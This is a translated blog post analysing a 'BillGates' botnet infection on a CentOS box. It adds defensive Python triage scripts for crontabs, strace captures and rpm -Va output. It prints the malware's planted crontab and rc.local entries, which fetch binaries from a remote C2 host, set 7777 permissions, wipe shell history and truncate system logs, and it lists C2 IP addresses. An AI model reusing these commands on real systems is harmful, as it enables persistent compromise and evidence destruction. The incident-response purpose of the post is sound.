
The Linux botnet virus "BillGates"


I thought this analysis was very good, so I decided to translate it; I hope to exchange ideas with everyone O(∩_∩)O~

Please credit the source when reposting: http://blog.csdn.net/u010484477     O(∩_∩)O thanks

Keywords: virus, linux, information security

In yesterday's post I mentioned that my home router, an x86 box running CentOS, had started behaving strangely on its own, as if something were loading the CPU. So I decided to climb in and see what was going on there, and I immediately realised that someone had got onto the server and left processes hanging around that talk to dgnfd564sdf.com. Mainly the following: atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd, xfsdxd and so on.

root      4741  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root      4753  0.0  0.0  41576  2268 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root      4756  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root      4757  0.0  0.0  41576  2268 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root      4760  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root      4764  0.0  0.0  41576  2268 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root      4767  0.0  0.0  41576  2264 ?  S  21:00  0:00 wget http://www.dgnfd564sdf.com:8080/skysapd

Startup analysis

At first I poked around trying to work out what had compromised my machine so thoroughly. The first thing that came to mind was to check /etc/rc.local. It contained:

cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd
Hmm, I thought, let me start with root's crontab. Like this:
# crontab -e
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
…
*/1 * * * * killall -9 nfsd4
…
*/1 * * * * killall -9 profild.key
…
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 kysapd
*/98 * * * * killall -9 atdd
*/97 * * * * killall -9 kysapd
*/96 * * * * killall -9 skysapd
*/95 * * * * killall -9 xfsdx
*/94 * * * * killall -9 ksapd
…
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
…
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/1 * * * * chmod 7777 /etc/skysapd
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/xfsdx
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&
…
*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&
*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&
*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&
*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
…
…
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
…
Oh, and it is 183 KB and 4036 lines, with the distribution's template comment block appended over and over between the entries. Have you ever seen a 183 KB crontab? Well, that is what I was looking at.
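A crontab like the one above is easier to read by machine than by eye. The following is an added example, not code from the original post or from the malware: it parses a crontab dump, tags each entry with the behaviour it exhibits (killing competing processes, periodic downloads from a remote host, chmod 7777, history wiping, log truncation, tampering with /etc/profile, launches hidden behind nohup), flags minute-field steps above 59 (which under Vixie-style cron only ever match minute 0, so such jobs effectively run hourly), and counts how many times the cron template header was re-appended. The rules and the sample crontab are constructed here from the entries quoted in the post.

```python
"""Triage a root crontab dump for the persistence and anti-forensics patterns shown above."""
import re
from collections import Counter

# Each rule: (label, regex applied to the command part of a crontab entry).
# Constructed from the entry types seen in the post; extend as needed.
RULES = [
    ("kill-competitors",    re.compile(r"\bkillall\s+-9\b")),
    ("remote-download",     re.compile(r"\b(?:wget|curl)\b.*\w+://")),
    ("world-writable-suid", re.compile(r"\bchmod\s+[0-7]?7777\b")),
    ("history-wipe",        re.compile(r"\.bash_history|\bhistory\s+-[cr]\b")),
    ("log-truncation",      re.compile(r"\bcd\s+/var/log\s*>\s*\S+")),
    ("profile-tamper",      re.compile(r">>\s*/etc/profile\b")),
    ("hidden-launch",       re.compile(r"\bnohup\s+\S+.*>\s*/dev/null")),
]

# Five schedule fields followed by the command.
CRON_ENTRY = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
TEMPLATE_HEADER = "# Edit this file to introduce tasks to be run by cron."


def parse_crontab(text):
    """Yield (schedule, command) for every non-comment, non-empty entry."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_ENTRY.match(line)
        if m:
            yield " ".join(m.groups()[:5]), m.group(6)


def unusual_minute_step(schedule):
    """True for entries like '*/99 * * * *': a step above 59 in the minute field
    only matches minute 0, so the job effectively runs once an hour."""
    minute = schedule.split()[0]
    return minute.startswith("*/") and minute[2:].isdigit() and int(minute[2:]) > 59


def triage(text):
    """Return (Counter of labels, list of (label, schedule, command), header_repeats)."""
    counts, hits = Counter(), []
    for schedule, command in parse_crontab(text):
        for label, rx in RULES:
            if rx.search(command):
                counts[label] += 1
                hits.append((label, schedule, command))
        if unusual_minute_step(schedule):
            counts["unusual-minute-step"] += 1
    # A crontab in which the distribution's template comment recurs was
    # appended to repeatedly rather than edited once.
    return counts, hits, text.count(TEMPLATE_HEADER)


# Constructed sample: entries quoted in the post plus one benign job.
SAMPLE_CRONTAB = """# Edit this file to introduce tasks to be run by cron.
#
*/1 * * * * killall -9 nfsd4
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/1 * * * * chmod 7777 /etc/atdd
*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * history -c
*/1 * * * * cd /var/log > auth.log
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
# Edit this file to introduce tasks to be run by cron.
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
"""

if __name__ == "__main__":
    counts, hits, repeats = triage(SAMPLE_CRONTAB)
    print(f"template header appended {repeats} times")
    for label, schedule, command in hits:
        print(f"{label:20} {schedule:18} {command}")
    print(dict(counts))
```

On a real host, feed it the output of `crontab -l -u root` and the files under /etc/cron.d; only the benign logrotate line in the sample comes through without a label.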

By the time I got onto the server, these processes were no longer doing anything (not loading the CPU, not using the network). Evidently they had decided to stop and lie low, so that these telltale signs would not persist and get them noticed. Their strace looked like this:
[root@<host> etc]# strace -p 3312
Process 3312 attached - interrupt to quit
[ Process PID=3312 runs in 32 bit mode. ]
restart_syscall(<... resuming interrupted call ...>) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, 


[root@<host> etc]# strace -p 3268
Process 3268 attached - interrupt to quit
[ Process PID=3268 runs in 32 bit mode. ]
recv(3, 0xfff19338, 4, 0)               = -1 ECONNRESET (Connection reset by peer)
close(3)                                = 0
futex(0x816e8a8, FUTEX_WAKE, 1)         = 1
futex(0x816e8a4, FUTEX_WAKE, 1)         = 1
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK)
fcntl64(3, F_SETFL, O_RDWR)             = 0
setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0
setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0", 27, 0) = 27
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, ^C <unfinished ...>
Process 3268 detached
Judging by this, the processes were doing almost nothing, just occasionally exchanging a little data. Apart from that, they had of course touched /etc/rc.local and the crontab, as well as the executables themselves (all of them carry the SUID bit, which lets them do whatever they like; but why were they neither deleted nor replaced?), and they had also tampered with /etc/profile:
unset MAILCHECK

This means the botnet had been on the machine for roughly 7 hours (presumably counted from the copies of that line, since the cron entry above appends it to /etc/profile every minute). Perhaps in reality it was not quite that long, but not much less either.
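The two strace captures above already contain the indicators a responder wants: the C2 endpoints, which of them answered, the socket timeouts, the retry interval and the beacon that carries the kernel version. The following is an added example, not code from the original post: it decodes strace's C-style string escapes, records every connect() target together with whether the subsequent send() succeeded or was refused, converts the SO_SNDTIMEO/SO_RCVTIMEO timeval arguments into seconds, notes the nanosleep() interval, and picks out the fixed-size message starting with the byte 'R' that embeds the OS string. The trace is constructed from lines quoted in the post; nothing about the message layout beyond the leading byte and the embedded "Linux ..." string is assumed.

```python
"""Extract network indicators from an strace capture of the bot's C2 loop."""
import re
import struct

CONNECT = re.compile(
    r'connect\(\d+, \{sa_family=AF_INET, sin_port=htons\((\d+)\), '
    r'sin_addr=inet_addr\("([\d.]+)"\)\}, \d+\)')
SEND = re.compile(r'send\(\d+, "((?:[^"\\]|\\.)*)"(?:\.\.\.)?, (\d+), \d+\) = (-?\d+)(?: (\w+))?')
TIMEOUT_OPT = re.compile(
    r'setsockopt\(\d+, SOL_SOCKET, (SO_SNDTIMEO|SO_RCVTIMEO), "((?:[^"\\]|\\.)*)", 8\)')
NANOSLEEP = re.compile(r'nanosleep\(\{(\d+), (\d+)\}')
ESCAPE = re.compile(r'\\([0-7]{1,3}|x[0-9a-fA-F]{2}|.)', re.S)
SIMPLE_ESCAPES = {"n": b"\n", "r": b"\r", "t": b"\t", "a": b"\a", "b": b"\b",
                  "f": b"\f", "v": b"\v", "e": b"\x1b", "\\": b"\\", '"': b'"'}


def decode_strace_string(s):
    """Turn strace's escaped string literal (octal, hex and C escapes) into bytes."""
    out, pos = bytearray(), 0
    for m in ESCAPE.finditer(s):
        out += s[pos:m.start()].encode("latin-1")
        esc = m.group(1)
        if esc[0] in "01234567":
            out.append(int(esc, 8))
        elif esc[0] == "x":
            out.append(int(esc[1:], 16))
        else:
            out += SIMPLE_ESCAPES.get(esc, esc.encode("latin-1"))
        pos = m.end()
    out += s[pos:].encode("latin-1")
    return bytes(out)


def summarize(trace):
    """Summarise C2 endpoints, socket timeouts, retry sleep and beacon messages."""
    endpoints, timeouts, sleeps, beacons = {}, {}, set(), []
    current = None
    for line in trace.splitlines():
        if m := CONNECT.search(line):
            current = (m.group(2), int(m.group(1)))
            endpoints.setdefault(current, "pending")
        elif m := TIMEOUT_OPT.search(line):
            # struct timeval in the 32-bit process: two little-endian 4-byte longs.
            secs, _usec = struct.unpack("<ll", decode_strace_string(m.group(2)))
            timeouts[m.group(1)] = secs
        elif m := NANOSLEEP.search(line):
            sleeps.add(int(m.group(1)))
        elif (m := SEND.search(line)) and current:
            payload = decode_strace_string(m.group(1))
            size, result, err = int(m.group(2)), int(m.group(3)), m.group(4)
            if err == "ECONNREFUSED":
                endpoints[current] = "refused"
            elif result > 0:
                endpoints[current] = "connected"
            if payload[:1] == b"R":  # the 401-byte check-in carrying the kernel version
                idx = payload.find(b"Linux")
                os_string = payload[idx:].split(b"\0")[0].decode("latin-1") if idx >= 0 else ""
                beacons.append({"endpoint": current, "size": size, "os_string": os_string})
    return {"endpoints": endpoints, "timeouts": timeouts,
            "sleep_seconds": sleeps, "beacons": beacons}


# Constructed sample, assembled from lines quoted in the post.
SAMPLE_TRACE = r'''socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress)
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused)
close(3)                                = 0
nanosleep({15, 0}, NULL)                = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress)
setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\17\0\0\0\0\0\0\0", 8) = 0
send(3, "R\r\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Linux 2.6.32-35"..., 401, 0) = 401
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\0\0\0\0\0\0\0", 8) = 0
recv(3, "\4\0\0\0", 4, 0)               = 4
send(3, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 27, 0) = 27
'''

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_TRACE).items():
        print(f"{key}: {value}")
```

Run against a full capture (strace -s 512 -p PID, so the send buffers are not truncated) the endpoint table is what goes into a block list, and the 15-second send timeout, 60-second receive timeout and 15-second reconnect sleep give the cadence to look for in firewall logs.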

Now I needed to check whether any system files had been modified. On CentOS it is enough to run:

rpm -Va
I was glad that the command printed exactly what I expected:
[root@<host> ~]# rpm -Va
S.5....T.  c /etc/ppp/chap-secrets
S.5....T.  c /etc/issue
S.5....T.  c /etc/crontab
S.5....T.  c /etc/nagiosgraph/access.conf
S.5....T.  c /etc/nagiosgraph/nagiosgraph.conf
.M.......    /usr/lib/nagiosgraph/cgi-bin/show.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showhost.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/showservice.cgi
.M.......    /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.css
.M.......    /usr/share/nagiosgraph/htdocs/nagiosgraph.js
S.5....T.    /var/log/nagiosgraph/nagiosgraph-cgi.log
S.5....T.    /var/log/nagiosgraph/nagiosgraph.log
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....    /lib/modules/2.6.32-358.2.1.el6.x86_64/build
S.5....T.  c /etc/tor/torrc
.M.......    /
.......T.  c /etc/ppp/options.pptpd
S.5....T.  c /etc/pptpd.conf
....L....  c /etc/pam.d/fingerprint-auth
....L....  c /etc/pam.d/password-auth
....L....  c /etc/pam.d/smartcard-auth
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rsyslog.conf
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
S.5....T.  c /etc/vsftpd/vsftpd.conf
.M.......    /var/ftp/pub
..5....T.  c /etc/sysconfig/PlexMediaServer
.......T.    /usr/lib/plexmediaserver/start.sh
S.5....T.  c /etc/sysconfig/lm_sensors
S.5....T.  c /etc/php.ini
S.5....T.  c /etc/httpd/conf/httpd.conf
.......T.    /etc/rc.d/init.d/deluge-daemon
S.5....T.  c /etc/cacti/db.php
S.5....T.  c /etc/cron.d/cacti
S.5....T.  c /etc/httpd/conf.d/cacti.conf
.M.......    /usr/share/cacti
.M.......    /usr/share/cacti/about.php
.M.......    /usr/share/cacti/auth_changepassword.php
.M.......    /usr/share/cacti/auth_login.php
.M.......    /usr/share/cacti/cdef.php
.M.......    /usr/share/cacti/cmd.php
.M.......    /usr/share/cacti/color.php
.M.......    /usr/share/cacti/data_input.php
.M.......    /usr/share/cacti/data_queries.php
.M.......    /usr/share/cacti/data_sources.php
.M.......    /usr/share/cacti/data_templates.php
.M.......    /usr/share/cacti/gprint_presets.php
.M.......    /usr/share/cacti/graph.php
.M.......    /usr/share/cacti/graph_image.php
.M.......    /usr/share/cacti/graph_settings.php
.M.......    /usr/share/cacti/graph_templates.php
.M.......    /usr/share/cacti/graph_templates_inputs.php
.M.......    /usr/share/cacti/graph_templates_items.php
.M.......    /usr/share/cacti/graph_view.php
.M.......    /usr/share/cacti/graph_xport.php
.M.......    /usr/share/cacti/graphs.php
.M.......    /usr/share/cacti/graphs_items.php
.M.......    /usr/share/cacti/graphs_new.php
.M.......    /usr/share/cacti/host.php
.M.......    /usr/share/cacti/host_templates.php
.M.......    /usr/share/cacti/images
.M.......    /usr/share/cacti/images/arrow.gif
.M.......    /usr/share/cacti/images/auth_deny.gif
.M.......    /usr/share/cacti/images/auth_login.gif
.M.......    /usr/share/cacti/images/auth_logout.gif
.M.......    /usr/share/cacti/images/button_add.gif
.M.......    /usr/share/cacti/images/button_cancel.gif
.M.......    /usr/share/cacti/images/button_cancel2.gif
.M.......    /usr/share/cacti/images/button_clear.gif
.M.......    /usr/share/cacti/images/button_colapse_all.gif
.M.......    /usr/share/cacti/images/button_create.gif
.M.......    /usr/share/cacti/images/button_default.gif
.M.......    /usr/share/cacti/images/button_delete.gif
.M.......    /usr/share/cacti/images/button_expand_all.gif
.M.......    /usr/share/cacti/images/button_export.gif
.M.......    /usr/share/cacti/images/button_go.gif
.M.......    /usr/share/cacti/images/button_help.gif
.M.......    /usr/share/cacti/images/button_import.gif
.M.......    /usr/share/cacti/images/button_no.gif
.M.......    /usr/share/cacti/images/button_purge.gif
.M.......    /usr/share/cacti/images/button_refresh.gif
.M.......    /usr/share/cacti/images/button_save.gif
.M.......    /usr/share/cacti/images/button_view.gif
.M.......    /usr/share/cacti/images/button_yes.gif
.M.......    /usr/share/cacti/images/cacti_about_logo.gif
.M.......    /usr/share/cacti/images/cacti_backdrop.gif
.M.......    /usr/share/cacti/images/cacti_backdrop2.gif
.M.......    /usr/share/cacti/images/cacti_logo.gif
.M.......    /usr/share/cacti/images/calendar.gif
.M.......    /usr/share/cacti/images/delete_icon.gif
.M.......    /usr/share/cacti/images/delete_icon_large.gif
.M.......    /usr/share/cacti/images/disable_icon.png
.M.......    /usr/share/cacti/images/enable_icon.png
.M.......    /usr/share/cacti/images/enable_icon_disabled.png
.M.......    /usr/share/cacti/images/favicon.ico
…

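The `rpm -Va` listing above is long, and most of it is the expected noise of a working server: edited config files (marked c), log files, symlinks that alternatives and authconfig manage. The lines that matter here are /etc/crontab and /etc/rc.d/rc.local, both with size and digest changes. The following is an added example, not code from the original post or from rpm: it parses the verify flag column (S size, M mode, 5 digest, L symlink, T mtime and so on) and the config marker, then ranks each entry so that changes under persistence locations or digest changes to non-config packaged files come first, mode changes (the chmod 7777 in the crontab would show up as M) next, and symlink-only or config edits last. The persistence path list and the sample lines are constructed from the post's output.

```python
"""Prioritise `rpm -Va` output so the lines that matter are read first."""
import re
from collections import defaultdict

VERIFY_LINE = re.compile(r"^(\S{9}|missing)\s+(?:([cdglr])\s+)?(\S.*)$")
FLAG_MEANING = {"S": "size", "M": "mode", "5": "digest", "D": "device", "L": "symlink",
                "U": "user", "G": "group", "T": "mtime", "P": "capabilities"}
# Locations an intruder edits to survive reboots or logins (constructed list).
PERSISTENCE_PATHS = ("/etc/crontab", "/etc/cron.d/", "/etc/rc.d/rc.local", "/etc/rc.local",
                     "/etc/profile", "/etc/ld.so.preload", "/etc/pam.d/", "/etc/rc.d/init.d/")
# Files that legitimately change after installation; never rated above "low".
NOISY_PATHS = ("/var/log/", "/var/lib/", "/var/cache/")


def parse_rpm_verify(text):
    """Return one dict per verify line: path, failed checks, config and missing flags."""
    entries = []
    for line in text.splitlines():
        m = VERIFY_LINE.match(line.rstrip())
        if not m:
            continue
        raw, attr, path = m.groups()
        missing = raw == "missing"
        entries.append({"path": path, "config": attr == "c", "missing": missing,
                        "flags": set() if missing else {c for c in raw if c in FLAG_MEANING}})
    return entries


def severity(entry):
    """Rank one verify entry: high, medium, low or info."""
    path, flags = entry["path"], entry["flags"]
    if entry["missing"]:
        return "medium"
    if path.startswith(NOISY_PATHS):
        return "low"
    persistent = path.startswith(PERSISTENCE_PATHS)
    if persistent and flags & set("S5M"):
        return "high"      # startup/login hook rewritten
    if "5" in flags and not entry["config"]:
        return "high"      # content of a packaged, non-config file was replaced
    if "M" in flags or (persistent and "T" in flags):
        return "medium"    # permissions changed (e.g. setuid added) or hook touched
    if flags and flags <= {"L"}:
        return "info"      # symlink target only, typical of alternatives/authconfig
    return "low"           # locally edited config file


def triage(text):
    """Group paths by severity, highest first, with the failed checks spelled out."""
    report = defaultdict(list)
    for e in parse_rpm_verify(text):
        checks = "missing" if e["missing"] else ",".join(FLAG_MEANING[f] for f in sorted(e["flags"]))
        report[severity(e)].append((e["path"], checks))
    return {level: report[level] for level in ("high", "medium", "low", "info") if report[level]}


# Constructed sample: a cross-section of the lines in the post's listing.
SAMPLE_OUTPUT = """S.5....T.  c /etc/ppp/chap-secrets
S.5....T.  c /etc/crontab
.M.......    /usr/share/cacti/about.php
S.5....T.    /var/log/nagiosgraph/nagiosgraph.log
missing     /usr/java/jre1.7.0_40/lib/install.jar
....L....  c /etc/pam.d/system-auth
S.5....T.  c /etc/rc.d/rc.local
..5....T.  c /etc/sysctl.conf
.......T.    /etc/rc.d/init.d/deluge-daemon
.M.......    /
"""

if __name__ == "__main__":
    for level, items in triage(SAMPLE_OUTPUT).items():
        print(level.upper())
        for path, checks in items:
            print(f"  {checks:22} {path}")
```

Keep in mind what rpm cannot tell you: files the malware dropped into /etc (atdd, cupsdd and friends) belong to no package, so `rpm -Va` never lists them; pair it with `rpm -qf` on anything unusual in /etc and the crontab review above.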